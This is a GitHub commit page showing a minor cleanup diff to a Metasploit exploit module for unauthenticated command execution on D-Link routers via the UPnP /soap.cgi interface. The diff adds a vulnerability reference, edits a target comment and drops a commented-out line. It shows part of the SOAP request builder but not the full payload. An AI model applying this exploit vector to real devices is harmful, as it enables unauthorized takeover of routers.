Skip to content

Commit f594c4b

Browse files
author
m-1-k-3
committed
small cleanup
1 parent 393c1b2 commit f594c4b

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/linux/http/dlink_upnp_exec_noauth.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -40,6 +40,7 @@ def initialize(info = {})
4040
'References' =>
4141
[
4242
[ 'OSVDB', '94924' ],
43+
[ 'BID', '61005' ],
4344
[ 'EDB', '26664' ],
4445
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-020' ]
4546
],
@@ -64,7 +65,7 @@ def initialize(info = {})
6465
'Platform' => 'unix'
6566
}
6667
],
67-
[ 'Linux mipsel Payload', #DIR-865, DIR-645, and some more
68+
[ 'Linux mipsel Payload', #DIR-865, DIR-645, and others with wget installed
6869
{
6970
'Arch' => ARCH_MIPSLE,
7071
'Platform' => 'linux'
@@ -87,7 +88,6 @@ def initialize(info = {})
8788
def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
8889

8990
uri = '/soap.cgi'
90-
#data_uri = "?service=WANIPConn1"
9191

9292
data_cmd = "<?xml version=\"1.0\"?>"
9393
data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"

0 commit comments

Comments
 (0)